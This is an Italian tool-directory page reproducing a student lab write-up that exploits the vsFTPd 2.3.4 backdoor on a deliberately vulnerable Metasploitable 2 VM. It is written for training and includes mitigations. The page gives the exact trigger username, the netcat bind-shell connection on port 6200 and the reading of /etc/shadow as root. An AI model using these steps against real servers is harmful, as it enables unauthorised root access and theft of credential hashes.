Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
metasploitable2-vsftpd-exploitation — Progetto: vsFTPd 2.3.4 sfruttamento backdoor (CVE-2011-2523) su Metasploitable 2. | Kitploit
Strumenti/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
Password CrackingEscalation di PrivilegiRicognizioneMappatura della ReteScansione PorteAnalisi delle VulnerabilitàExploitPost-ExploitPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

Progetto: vsFTPd 2.3.4 sfruttamento backdoor (CVE-2011-2523) su Metasploitable 2.

Vedi Repository
54 mesi faNon ancora revisionato

Metasploitable 2 - Laboratorio di sfruttamento di vsFTPd 2.3.4

Panoramica

Questo progetto mostra un flusso di lavoro di penetration testing contro una macchina volutamente vulnerabile, Metasploitable 2. L'obiettivo era identificare, sfruttare e analizzare una vulnerabilità nota nel servizio FTP, ottenendo infine accesso a livello root e valutando l'impatto sulla sicurezza.


Configurazione del Laboratorio

  • Macchina Attaccante: Ubuntu (Macchina Virtuale)
  • Macchina Target: Metasploitable 2 (Macchina Virtuale)
  • Configurazione di Rete: Rete solo host (192.168.56.0/24)

Verifica del Target

Verificato il sistema target e la sua configurazione di rete:

root@kitploit:~
whoami
hostname
ifconfig

Verifica configurazione target


Verifica Connettività

Confermata la connettività di rete tra attaccante e target:

root@kitploit:~
ping 192.168.56.101

Verifica connettività Ping


Obiettivi

  • Effettuare ricognizione di rete
  • Identificare servizi esposti
  • Rilevare software vulnerabile
  • Sfruttare una vulnerabilità backdoor nota
  • Ottenere accesso root
  • Condurre analisi post-sfruttamento

Strumenti Utilizzati

  • Nmap
  • Telnet
  • Netcat
  • Linux (Ubuntu VM)

Riepilogo del Flusso di Attacco

  1. Verificata configurazione e connettività del target
  2. Scoperto host target sulla rete locale
  3. Identificate porte aperte e servizi esposti
  4. Rilevato servizio FTP vulnerabile (vsFTPd 2.3.4)
  5. Attivata backdoor tramite login FTP modificato
  6. Ottenuto accesso root attraverso bind shell
  7. Eseguita enumerazione post-sfruttamento

Ricognizione

Effettuata scoperta host:

root@kitploit:~
nmap -sn 192.168.56.0/24

Identificati host attivi sulla rete.

Scansione scoperta host


Scansione delle Porte

root@kitploit:~
nmap 192.168.56.101

Scoperte diverse porte aperte, tra cui:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

Risultati scansione porte


Enumerazione dei Servizi

root@kitploit:~
nmap -sV 192.168.56.101

Identificato il servizio FTP in esecuzione:

root@kitploit:~
vsFTPd 2.3.4

Una scansione completa dei servizi e basata su script è inclusa nei file di supporto: Output Scansione Nmap.

Enumerazione servizi


Identificazione della Vulnerabilità

Il servizio FTP stava eseguendo una versione vulnerabile nota:

vsFTPd 2.3.4

Questa versione di vsFTPd è stata distribuita con una backdoor malevola che viene attivata quando un nome utente contenente :) viene utilizzato durante l'autenticazione. Una volta attivata, il servizio apre una bind shell sulla porta 6200, consentendo l'accesso remoto non autorizzato.


Sfruttamento (Manuale)

Attivata la backdoor usando Telnet:

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Attivazione backdoor tramite Telnet


Accesso alla Shell

Connesso alla backdoor usando Netcat:

root@kitploit:~
nc 192.168.56.101 6200

Connessione bind shell


Risultato

root@kitploit:~
whoami
root@kitploit:~
root

Accesso root ottenuto con successo

Prova accesso root


Post-Sfruttamento

Dopo aver ottenuto l'accesso root, è stata eseguita un'enumerazione di base del sistema:

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • Enumerati utenti di sistema e account di servizio
  • Recuperate credenziali hashate da /etc/shadow
  • Dimostrato accesso a file di sistema sensibili

Enumerazione utenti

Accesso file shadow


Impatto

  • Compromissione totale del sistema (accesso root)
  • Capacità di eseguire comandi arbitrari
  • Esposizione di dati sensibili delle credenziali
  • Potenziale per movimento laterale all'interno di una rete

Mitigazione

  • Rimuovere o disabilitare il servizio FTP se non necessario
  • Aggiornare il software vulnerabile a versioni sicure
  • Sostituire i protocolli insicuri (come FTP non crittografato) con alternative sicure (SFTP)
  • Limitare l'accesso ai servizi critici tramite regole firewall
  • Implementare logging e monitoraggio
  • Applicare politiche di autenticazione forti

File di Supporto

  • Output Scansione Nmap

Punto Chiave

Questo laboratorio dimostra come un singolo servizio vulnerabile possa portare a una compromissione totale del sistema. Evidenzia l'importanza di una corretta configurazione dei servizi, della gestione delle patch e della minimizzazione delle superfici di attacco esposte.

Cosa Ho Imparato

Era la prima volta che sfruttavo manualmente una backdoor reale. Ho imparato come una singola stringa di nome utente malevola (:)) possa attivare l'accesso root, il che ha rafforzato il motivo per cui l'enumerazione dei servizi e il rilevamento delle versioni sono così importanti nella ricognizione. Mi sono anche sentito più a mio agio con i comandi di base di post-exploitation in Linux, come leggere /etc/shadow e capire come appaiono realmente le credenziali hashate.

Limitazioni

Questo era un ambiente di laboratorio controllato utilizzando Metasploitable 2, una macchina volutamente vulnerabile. La backdoor di vsFTPd 2.3.4 è una CVE nota (CVE-2011-2523) del 2011, quindi non riflette un impegno reale moderno. In una valutazione reale, sarebbero necessari ulteriori passaggi come elusione, bypass dei log o pivoting. Questo progetto si è concentrato sulla comprensione dei meccanismi principali dell'exploit, non su un test di penetrazione completo.

Scarica lo strumento